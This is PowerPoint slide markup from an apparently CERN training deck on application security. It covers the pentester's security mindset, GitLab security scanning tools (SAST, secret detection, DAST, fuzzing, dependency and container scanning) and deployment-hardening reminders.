              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill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7925522-B684-DD86-F22C-1ACDB5DA12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32040" y="2636912"/>
              <a:ext cx="2159000" cy="7747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05E5454-DC0A-9448-02CE-D1BEE58824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0588727">
              <a:off x="6174178" y="3111117"/>
              <a:ext cx="1981200" cy="9144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CF1CBA5-8FAD-E128-DA2A-B6F8133E9A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723418">
              <a:off x="5090438" y="3844183"/>
              <a:ext cx="1943100" cy="342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08546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25ADEC0-28F3-4D59-AEBA-64BBC70986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945" y="651011"/>
            <a:ext cx="6694836" cy="39369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DA4096-DC9D-C7D8-D7BB-7E1D96BA4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A4A1C5-F1D5-8C3E-B381-06ABCE3D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F0C6AB-3BDC-A576-05C4-EE7FA5567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28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866193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Becoming a white-hat hacker (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pentester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Don’t assume; try!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>“What if I change this value?”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1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dirty="0"/>
              <a:t>The browser is yours</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> bypass client-side checks, manipulate data, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>alter or inject requests sent to the server etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>… and you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>should</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 🙂</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:sym typeface="Wingdings"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="3429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Build a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>security mindset</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> think not how systems work, but how they can break</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.schneier.com/blog/archives/2008/03/the_security_mi_1.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="135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29</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR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61EC032-22EC-2377-C103-BB3947EE4F4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6005905" y="1071287"/>
            <a:ext cx="2952328" cy="129614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Follow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>CERN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>WhiteHat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> training</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>!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574F6E-B449-2039-8C66-0789B87E7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0534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51435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F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Why?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FED330-D994-5BD9-ADDC-8E075FF5C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4404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3F2C77-71F2-E2FA-5BB1-E0A663CE29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E7625-68D2-D000-9448-CEBFFAC56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99" cy="51435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F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Application security scanning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0B680D-E692-BB88-BDE8-023799FD2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30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00666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81433-F862-E827-B52F-4225A80E1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security scanning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A47488-BFA0-708F-B252-C04F319B4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67D5D2-0371-E39B-F9AE-209A3545C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31</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR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1E9984B-1BFF-C4A0-864F-6893046513B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="339368" y="915566"/>
            <a:ext cx="5761736" cy="3744417"/>
            <a:chOff x="1505853" y="979551"/>
            <a:chExt cx="6658579" cy="432725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08C5B82-FD79-FD00-F84A-019FF99D776C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4373232" y="5060587"/>
              <a:ext cx="3438762" cy="246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From </a:t>
              </a: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hlinkClick r:id="rId2"/>
                </a:rPr>
                <a:t>https://docs.gitlab.com/ee/user/application_security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1026" name="Picture 2" descr="CI/CD stages and matching GitLab application security tools">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3B0D4B7-E413-198D-C763-CDD0820DFE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5853" y="979551"/>
              <a:ext cx="6658579" cy="40944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086A724-2C8E-3B0E-8BCB-4E9A1F9275AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899592" y="1851670"/>
            <a:ext cx="1224136" cy="5760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B1AC4AF-0BF6-7DDD-8A81-C3CB0CE31C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3274" y="1887674"/>
            <a:ext cx="1656183" cy="7200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sz="1200" b="1" dirty="0"/>
              <a:t>Enabled in CERN GitLab instance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55E793B-9645-6E46-61F0-1B754FDFA2A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="12" idx="1"/>
            <a:endCxn id="10" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2123728" y="2139702"/>
            <a:ext cx="2519546" cy="1080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AE6FE4B8-6C4F-3BFA-49F8-699696B2EA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2472" y="915566"/>
            <a:ext cx="1778000" cy="37084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4C1D8E0-1F71-ED7F-3F05-7D3A67A2C434}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7019800" y="1368644"/>
            <a:ext cx="1800671" cy="192317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135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uiExpand="1" build="p" animBg="1"/>
      <p:bldP spid="2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128DC-35FD-FFED-5FBE-826DF4AFF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Various scans / tests toolkits available in GitLab</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://docs.gitlab.com/ee/user/application_security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/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CD34A9-4047-24F9-3EA0-FF216908F7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600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Source code analysis:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>SAST (Static Application Security Testing)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> → looking for known vulnerabilities </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>Secret detection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>→ looking for passwords, secrets, private keys in repository history</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dynamic (live) analysis:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>DAST (Dynamic Application Security Testing)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> → looking for known attack vectors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>API security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> → looking for known attack vectors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>API fuzzing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> → looking for unknown bugs/vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="42862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>
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dependency analysis:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>Dependency scanning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> → at build time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>Container scanning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> → once the container image is built</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Infrastructure analysis:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>Infrastructure as Code (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>IaC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>) scanning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> → looking for common mistakes/vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US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AC8B26-3989-85AB-978B-CE81BCF5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06A310-0FAE-7F6F-230C-978F42994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32</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 2" descr="CI/CD stages and matching GitLab application security tools">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0CDEC7B-A90E-59A5-4656-207B28CB28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797" y="2571750"/>
            <a:ext cx="2676069" cy="1645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70471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40488-7976-D1B0-6B4B-D1C26E7E3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SAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (Static Application Security Testing)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://docs.gitlab.com/ee/user/application_security/sast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/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9E2815-DD30-B5AB-3292-9758CEF59D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Tools that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>analyse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> source code, and look for potential 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security vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, functionality bugs, performance issues etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No magic:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>some trivial / obvious errors will be missed (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>false negatives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some reported issues are not in fact problematic (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>false positives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the tool won’t fix your code for you (that comes with AI…?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many supported </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>languages/frameworks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>(Python, C/C++, Java, JS, .NET etc.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most scans done with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>semgrep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dirty="0"/>
              <a:t>DEMO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36DC45-8111-B5EB-EED6-C5E77EABB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330A3E-F2DB-0A6E-0168-D11D84EE8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33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1889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CE817-5E0D-EB41-C224-36544ECA8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Secret detection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – real life examples</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:b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2FB2D0-CF57-1C44-EDAD-05B9C1F66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D94039-1008-29D4-DE9C-C5F1B872F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34</a:t>
            </a:fld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AFE660-F6F1-C23E-FF94-5362DBEFBF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6056"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="751501"/>
            <a:ext cx="4104442" cy="6413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99B975-1C79-AC01-C967-2CDD38B3777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6165"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4499992" y="751501"/>
            <a:ext cx="4104436" cy="6159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F121994-E136-1FD6-B530-A74FF75F1C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1777483"/>
            <a:ext cx="3314700" cy="5588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F5B7843-0A52-A523-F743-92F9A95106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1" y="2746608"/>
            <a:ext cx="3829050" cy="14859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79E5C-CFD2-15B6-05EA-863FB48B1F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9991" y="1777483"/>
            <a:ext cx="5441950" cy="5715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F0075A8-324B-EDCE-975B-F92376A9C9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99991" y="2746608"/>
            <a:ext cx="4959350" cy="121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7C3393A-9411-A2FC-64D9-CB90728F1181}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="892469" y="4291231"/>
            <a:ext cx="19062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😐 partial exposure</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>😅 obsolete key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2F6E29-F7A0-D74B-D649-9A29D280F1A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4933251" y="4011910"/>
            <a:ext cx="35846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🙂 false positive (not a real exposure)</a:t>
            </a:r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9C36E5CC-0C0A-CFDB-A82E-BDB4763E59B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1845614" y="1423562"/>
            <a:ext cx="158027" cy="319035"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow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411AB2AB-D5B8-197F-C0D6-DF76A27F7814}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1845614" y="2396731"/>
            <a:ext cx="158027" cy="319035"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{706AA5E1-D077-7C67-8444-4DEF9A2CDC33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6093019" y="1422356"/>
            <a:ext cx="158027" cy="319035"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow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5102ED34-D267-6190-20D8-53F32CDEB403}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6093019" y="2395525"/>
            <a:ext cx="158027" cy="319035"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow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1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/>
      <p:bldP spid="16" grpId="0" animBg="1"/>
      <p:bldP spid="17" grpId="0" animBg="1"/>
      <p:bldP spid="1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026DC3-FEF8-9E66-C484-699D083630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A5FD3-5308-D76B-D4AB-B3BC12C1C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to avoid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47CCA4-E800-9627-1638-CB1CCB96DF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0D58DF-E356-40FE-9356-3B9EA07C2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6CBFB5-A645-B39D-7556-CB60150A0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35</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 3" descr="\\cern.ch\dfs\Users\s\slopiens\Documents\Computer Security\Presentations\materials\epic-fail-life-preserver-fail.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11E87FEA-9B1B-9D53-E153-E5FCBD3872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7704" y="936848"/>
            <a:ext cx="5782866" cy="386715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6A6915E2-C5E0-B021-9BC6-D68940124AB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="457052">
            <a:off x="879727" y="3421125"/>
            <a:ext cx="2758679" cy="970359"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security tools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that are disabled, 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or impossible to use</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2187522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C5DD05-D001-8B89-1EDF-0A724165C8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F020C-D29C-7D90-8F36-A6023580E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99" cy="51435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F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deployment security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843728-9221-B9C6-DED6-880D4B9DD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36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68907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4DE3A-0A76-406E-0030-283ADC55A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51157B-CA31-D1D6-81B1-927EE34123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435482-23BB-F8C3-470E-2726AD029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E3F7B6-FD86-4EB5-2B36-7D7CF5815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37</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR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923A879F-0895-6C90-DDAC-C5D163575F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99" y="30591"/>
            <a:ext cx="3744147" cy="4755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7B44C6-F3D6-4997-8D2D-64D1AAF63ADD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5659791" y="3752470"/>
            <a:ext cx="19752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https://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xkcd.com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/2347/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="70325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04997-5C40-A686-BD10-E25C44D9C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Deployment security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – a few reminders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9DC1EC-84F5-9325-8944-C253AC564E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/>
              <a:t>Avoid supply-chain attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="349250" lvl="1">
              <a:tabLst>
                <a:tab pos="5138738" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>trusted software</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> (libraries, modules, packages)	→ check popularity and history,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>beware of typo-squatting (similar names)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="349250" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>trusted sources</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> → use only legitimate repositories, check signatures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="349250" lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Harden your deployment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="349250" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>less is more</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: install only the necessary packages, open only the required ports etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="349250" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>update software regularly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> (rebuild image if needed)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="349250" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>use unprivileged accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="349250" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>restrict access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> to hosting / backend infrastructure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="349250" lvl="1"/>
            <a:endParaRPr lang="en-US" sz="16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1800" dirty="0"/>
              <a:t>Protect secrets, use strong passwords, rotate keys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ED7CC1-0E4E-D7F3-3FF5-573BA630C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CDCBF3-440D-32D5-5A51-F01B6FC5C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38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E24DE2-FF82-5AA3-7BA8-ECF3BDA50EF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0" t="12816" r="-100" b="16310"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5796136" y="3354546"/>
            <a:ext cx="1511300" cy="3600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82CACB0-8915-6B68-08C6-BE6EAC9A04B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5865465" y="3651870"/>
            <a:ext cx="30981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ndale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>FROM python:3.12-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>slim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2611047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C55F3-EAD7-1AA7-3874-B93FEA301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to avoid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6A631-CADB-BE39-9533-3771CE0F03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4CF89F-8FD9-3729-85C8-D5DE1303F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4F45DB-2279-DA58-73A5-964B9410B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39</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 2" descr="E:\Local\2010.06 Sec Day\securing\img\failcamera.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C265D50-DB0B-86F7-2BCD-6FBC204FC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8331" y="844154"/>
            <a:ext cx="5924550" cy="372546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24DCE22-67EA-5649-F233-C02566157CCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="399985">
            <a:off x="892046" y="3615929"/>
            <a:ext cx="2867025" cy="1277540"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security measures that get disabled with time, when new features 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are installed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84654AF8-EFD3-A629-20D0-2B1D59CDB061}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="21264967">
            <a:off x="5822955" y="3981464"/>
            <a:ext cx="2380775" cy="952197"/>
          </a:xfrm>
